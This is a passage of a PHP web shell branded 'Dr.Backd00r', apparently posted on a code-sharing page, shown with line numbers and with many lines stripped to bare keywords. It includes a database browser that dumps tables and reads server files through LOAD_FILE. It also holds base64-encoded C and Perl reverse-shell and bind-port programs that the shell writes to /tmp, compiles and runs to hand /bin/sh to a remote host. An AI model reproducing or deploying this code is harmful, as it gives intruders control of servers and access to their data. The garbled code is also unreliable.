1084. .'<tr><td><span>Dictionary</span></td>'
1085. .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
1086. .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
1087. echo
1088. printFooter
1089. }
1091. function actionSql
1092. class DbClass
1093. var
1094. var
1095. var
1096. function DbClass
1097. $this->type = $type;
1098. }
1099. function connect
1100. switch
1101. case
1102. if
1103. break
1104. case
1105. $host = explode(':', $host);
1106. if
1107. if
1108. break
1109. }
1110. return false
1111. }
1112. function selectdb
1113. switch
1114. case
1115. if
1116. break
1117. }
1118. return false
1119. }
1120. function query
1121. switch
1122. case
1123. return
1124. break
1125. case
1126. return
1127. break
1128. }
1129. return false
1130. }
1131. function fetch
1132. $res = func_num_args()?func_get_arg(0):$this->res;
1133. switch
1134. case
1135. return
1136. break
1137. case
1138. return
1139. break
1140. }
1141. return false
1142. }
1143. function listDbs
1144. switch
1145. case
1146. return
1147. break
1148. case
1149. return
1150. break
1151. }
1152. return false
1153. }
1154. function listTables
1155. switch
1156. case
1157. return
1158. break
1159. case
1160. return
1161. break
1162. }
1163. return false
1164. }
1165. function error
1166. switch
1167. case
1168. return
1169. break
1170. case
1171. return
1172. break
1173. }
1174. return false
1175. }
1176. function setCharset
1177. switch
1178. case
1179. if
1180. return
1181. else
1182. $this->query('SET CHARSET '.$str);
1183. break
1184. case
1185. return
1186. break
1187. }
1188. return false
1189. }
1190. function dump
1191. switch
1192. case
1193. $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1194. $create = mysql_fetch_array($res);
1195. echo
1197. ";
1198. $this->query('SELECT * FROM `'.$table.'`');
1199. while
1200. $columns = array();
1201. foreach
1202. $item[$k] = "'".@mysql_real_escape_string($v)."'";
1203. $columns[] = "`".$k."`";
1204. }
1205. echo
1206. ";
1207. }
1208. break
1209. case
1210. $this->query('SELECT * FROM '.$table);
1211. while
1212. $columns = array();
1213. foreach
1214. $item[$k] = "'".addslashes($v)."'";
1215. $columns[] = $k;
1216. }
1217. echo
1218. ";
1219. }
1220. break
1221. }
1222. return false
1223. }
1224. };
1225. $db = new DbClass($_POST['type']);
1226. if
1227. ob_start
1228. $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1229. $db->selectdb($_POST['sql_base']);
1230. header
1231. header
1232. foreach
1233. $db->dump($v);
1234. exit
1235. }
1236. printHeader
1237. ?>
1238. <h1>Sql browser</h1><div class=content>
1239. <form name="sf" method="post">
1240. <table cellpadding="2" cellspacing="0">
1241. <tr>
1242. <td>Type</td>
1243. <td>Host</td>
1244. <td>Login</td>
1245. <td>Password</td>
1246. <td>Database</td>
1247. <td></td>
1248. </tr>
1249. <tr>
1250. <input type=hidden name=a value=Sql>
1251. <input type=hidden name=p1 value='query'>
1252. <input type=hidden name=p2>
1253. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'>
1254. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
1255. <td>
1256. <select name='type'>
1257. <option value="mysql" <?php if(@$_POST['type']=='mysql')echo 'selected';?>>MySql</option>
1258. <option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo 'selected';?>>PostgreSql</option>
1259. </select></td>
1260. <td><input type=text name=sql_host value='<?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td>
1261. <td><input type=text name=sql_login value='<?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td>
1262. <td><input type=text name=sql_pass value='<?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td>
1263. <td>
1264. <?php
1265. $tmp = "<input type=text name=sql_base value=''>";
1266. if
1267. if
1268. switch
1269. case "Windows-1251"
1270. case "UTF-8"
1271. case "KOI8-R"
1272. case "KOI8-U"
1273. case "cp866"
1274. }
1275. $db->listDbs();
1276. echo "<select name=sql_base><option value=''></option>"
1277. while
1278. list
1279. echo
1280. }
1281. echo
1282. }
1283. else echo
1284. }else
1285. echo
1286. ?></td>
1287. <td><input type=submit value=">>"></td>
1288. </tr>
1289. </table>
1290. <script>
1291. function st
1292. document .sf.p1.value
1293. document .sf.p2.value
1294. if
1295. document .sf.submit
1296. }
1297. function is
1298. for
1299. document .sf.elements
1300. }
1301. </script>
1302. <?php
1303. if
1304. echo "<br/><table width=100% cellpadding=2 cellspacing=0>"
1305. if
1306. $db->selectdb($_POST['sql_base']);
1307. echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>"
1308. $tbls_res = $db->listTables();
1309. while
1310. list
1311. $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1312. $value = htmlspecialchars($value);
1313. echo "<nobr><input type='checkbox' name='tbl[]' value='" .
1314. }
1315. echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=" download
1316. if
1317. $_POST['p1'] = 'query';
1318. $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
1319. $num = $db->fetch();
1320. $num = $num['n'];
1321. echo "<span>" .
1322. for
1323. if
1324. echo "<a href='#' onclick='st(" ".$_POST['p2']."
1325. else
1326. echo
1327. if
1328. $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1329. else
1330. $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1331. echo "<br><br>"
1332. }
1333. if
1334. $db->query(@$_POST['p3']);
1335. if
1336. $title = false;
1337. echo
1338. $line = 1;
1339. while
1340. if
1341. echo
1342. foreach
1343. echo
1344. reset
1345. $title=true;
1346. echo
1347. $line = 2;
1348. }
1349. echo
1350. $line = $line==1?2:1;
1351. foreach
1352. if
1353. echo
1354. else
1355. echo
1356. }
1357. echo
1358. }
1359. echo
1360. } else {
1361. echo
1362. }
1363. }
1364. echo "<br><textarea name='p3' style='width:100%;height:100px'>" .
1365. echo "</td></tr>"
1366. }
1367. echo "</table></form><br/><form onsubmit='document.sf.p1.value=" loadfile
1368. if
1369. $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
1370. $file = $db->fetch();
1371. echo
1372. }
1373. }
1374. echo
1375. printFooter
1376. }
1377. function actionNetwork
1378. printHeader
1379. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
1380. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1381. $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
1382. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1383. ?>
1384. <h1>Network tools</h1><div class=content>
1385. <form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
1386. <span>Bind port to /bin/sh</span><br/>
1387. port
1388. </form>
1389. <form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
1390. <span>Back-connect to</span><br/>
1391. Server
1392. </form><br>
1393. <?php
1394. if
1395. function cf
1396. $w=@fopen($f,"w") or @function_exists('file_put_contents');
1397. if
1398. @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
1399. @fclose($w);
1400. }
1401. }
1402. if
1403. cf
1404. $out = ex("gcc -o /tmp/bp /tmp/bp.c");
1405. @unlink("/tmp/bp.c");
1406. $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
1407. echo
1408. ".ex("ps aux | grep bp")."</pre>";
1409. }
1410. if
1411. cf
1412. $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
1413. echo
1414. ".ex("ps aux | grep bp.pl")."</pre>";
1415. }
1416. if
1417. cf
1418. $out = ex("gcc -o /tmp/bc /tmp/bc.c");
1419. @unlink("/tmp/bc.c");
1420. $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
1421. echo
1422. ".ex("ps aux | grep bc")."</pre>";
1423. }
1424. if
1425. cf
1426. $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
1427. echo
1428. ".ex("ps aux | grep bc.pl")."</pre>";
1429. }
1430. }
1431. echo
1432. printFooter
1433. }
1434. if
1435. if
1436. $_POST['a'] = $default_action;
1437. else
1438. $_POST['a'] = 'SecInfo';
1439. if
1440. call_user_func
1441. ?>
1442. <div id="cot_tl_fixed"><marquee>Shell - *Dr.Backd00r* - SubhashDasyam.com</marquee></div>
1443. </marquee></div>
Erweitern

Kommentare

Es gibt noch keine Kommentare. Schreibe jetzt den Ersten!

Kommentieren

Melde dich an um einen Kommentar zu schreiben.